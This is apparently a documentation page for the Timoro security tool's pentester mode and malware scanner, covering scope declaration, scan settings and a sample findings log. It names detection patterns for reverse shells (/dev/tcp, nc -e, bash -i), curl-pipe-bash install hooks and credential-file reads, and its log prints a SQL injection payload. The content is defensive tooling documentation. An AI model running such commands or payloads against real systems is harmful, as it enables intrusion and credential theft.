// Reference

Pentester Mode

Static code analysis and active attack testing. Timoro acts as a real-time security guardian running continuously alongside your code.

⚠Active mode performs real offensive tests. Use exclusively on systems you own or have explicit written authorization to test. Unauthorized use against third-party systems may constitute a crime under local law. KR Riley Soluções is not responsible for misuse.

Static Mode

Analyzes your source code without making any network requests. Safe for any environment including production CI/CD pipelines.

configTypeScript

pentester: {
  enabled: true,
  mode: 'static',
  static: {
    owasp:        true,  // OWASP Top 10 patterns
    secrets:      true,  // hardcoded API keys, tokens, passwords
    dependencies: true,  // CVEs via npm audit + OSV database
    injections:   true,  // SQL, XSS, path traversal in source
    headers:      true,  // insecure HTTP header patterns
  },
  severity: 'medium',
}

Check	What it detects
OWASP Top 10	Broken auth, XSS, injections, misconfiguration, A01–A10
Exposed secrets	AWS keys, API keys, passwords, JWT secrets hardcoded in source
Vulnerable deps	CVE database check + npm audit + OSV database lookup
Injection patterns	SQL (string concatenation), command injection, path traversal
Insecure headers	Missing CSP, X-Frame-Options, HSTS, X-Content-Type-Options

Active Mode

Real attack testing against your running application. Requires pentester.target and a signed authorization scope before any attack test runs.

🔒Active mode validates every target against your declared scope using CIDR matching. Public internet IPs are blocked without explicit scope. DoS tools (hping3, slowloris, loic, hoic) and mass scans (/16+ CIDR) are blocked unconditionally.

declare scope firstterminal

timoro pentest --declare-scope

# interactive prompts:
# authorized by: John Doe
# targets: 192.168.1.0/24, http://staging.myapp.com
# allowed modes: static, active
# duration: 8h
# → creates .timoro/pentest-scope.json (SHA-256 integrity hash)

configTypeScript

pentester: {
  enabled: true,
  mode: 'active',
  target: 'http://localhost:3000',
  realtime: true,

  bruteforce: {
    enabled:         true,
    endpoints:       ['/auth/login', '/admin'],
    wordlist:        'built-in',
    detectRateLimit: true,
    jwtWeak:         true,
  },

  firewall: {
    enabled:      true,
    portScan:     true,
    cors:         true,
    ssl:          true,
    hsts:         true,
    xFrameOptions:true,
  },

  active: {
    sqlInjection:       true,
    xssReflected:       true,
    idor:               true,
    directoryTraversal: true,
    hiddenRoutes:       true,
  },

  severity: 'low',
}

Brute Force

Test	What it does
endpoints	Tests common passwords against your auth endpoints
detectRateLimit	Verifies if the API blocks repeated failed attempts
jwtWeak	Tests JWT tokens signed with predictable/common secrets
sessionExpiry	Verifies session expiration and invalidation

Network & Firewall

Test	What it does
portScan	Detects unnecessarily exposed ports (DB ports, Redis, etc.)
cors	Detects overly permissive cross-origin policies
ssl	Verifies SSL/TLS versions and cipher suites
hsts	Checks for HTTP Strict Transport Security header
xFrameOptions	Checks for clickjacking protection

Active Endpoint Tests

Test	What it does
sqlInjection	Injects real payloads into endpoints (not just code analysis)
xssReflected	Tests real XSS payloads against routes
idor	Attempts to access resources belonging to other users
directoryTraversal	Attempts to access files outside permitted scope
hiddenRoutes	Discovers undocumented but accessible endpoints

Severity levels

Set severity to filter which findings get logged. Only findings at or above the threshold are written to .timoro/log.md.

Level	Examples
critical	SQL injection, hardcoded secrets, active exploit confirmed
high	Missing rate limiting, XSS, brute force exposure
medium	Open ports, CORS misconfiguration, missing CSP
low	Missing security headers, outdated deps with low-risk CVEs

Malware Scanner

Separate from the pentester, timoro scan analyzes your project for malicious code patterns and compromised dependencies. Safe for CI/CD — exit code 1 on critical or high findings.

terminal

timoro scan                 # colored output grouped by category
timoro scan --report        # generate HTML + Markdown report
timoro scan --json          # raw JSON for CI pipelines

Category	Severity	Examples
remote-shell	critical	/dev/tcp, nc -e, bash -i >&
supply-chain	critical	curl \| bash in postinstall scripts
obfuscation	high	eval(atob()), large String.fromCharCode arrays
data-exfiltration	high	credential harvest + external upload
credential-theft	high	SSH key reads, /etc/passwd, ~/.aws/credentials
persistence	high	crontab writes, systemd units, shell profile modification
crypto-mining	high	stratum+tcp://, xmrig, cryptonight references
typosquatting	medium	Package names within Levenshtein distance ≤2 of popular packages

Log output example

.timoro/log.md

## [14:23:10] 🔐 Pentester — SQL Injection

**Mode:** Active
**Endpoint:** `GET /api/users?id=1`
**Severity:** `CRITICAL`
**Payload:** `1' OR '1'='1`

**Result:** Endpoint vulnerable. Returned all table records.

**File:** `src/controllers/user.controller.ts`
**Line:** 28

**Recommendation:** Use parameterized queries or an ORM.

---

## [14:22:10] 🔐 Pentester — Brute Force

**Mode:** Active
**Endpoint:** `POST /auth/login`
**Severity:** `HIGH`

**Result:** No rate limiting. 50 attempts in 5s — not blocked.

**Recommendation:** Implement express-rate-limit.
Block IP after 5 failures within 60 seconds.

← API Reference Changelog →